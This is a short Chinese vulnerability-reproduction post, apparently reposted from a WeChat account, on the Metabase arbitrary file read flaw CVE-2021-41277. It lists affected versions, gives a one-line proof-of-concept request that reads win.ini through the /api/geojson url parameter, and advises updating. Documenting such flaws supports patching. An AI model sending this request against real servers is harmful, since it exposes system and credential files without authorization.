【漏洞复现】Metabase 任意文件读取漏洞（CVE-2021-41277）

2023年10月20日14:14:26评论36 views字数 460阅读1分32秒阅读模式

声明：请勿将文章内的相关技术用于非法目的，如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。

0X01 简介

Metabase是一个开源的商业智能平台。你可以使用Metabase探索你的数据，或者将Metabase嵌入你的应用程序中，让你的客户自己探索他们的数据。

官网：

https://www.metabase.com/

漏洞编号：

CVE-2021-41277

影响范围：

Metabase open source < 0.40.5

Metabase Enterprise < 1.40.5

复现环境：

Metabase open source 0.40.4

0X02 漏洞复现

POC：

GET /api/geojson?url=file:c://Windows/win.ini HTTP/1.1Host: 192.168.245.134:3000

0X03 修复建议

更新至最新版！

0X04 写在最后

回复“加群”，获取群号。

侵删！

原文始发于微信公众号（皓月的笔记本）：【漏洞复现】Metabase 任意文件读取漏洞（CVE-2021-41277）

Linux 网络 ELI5 — 第 1 部分，网络和接口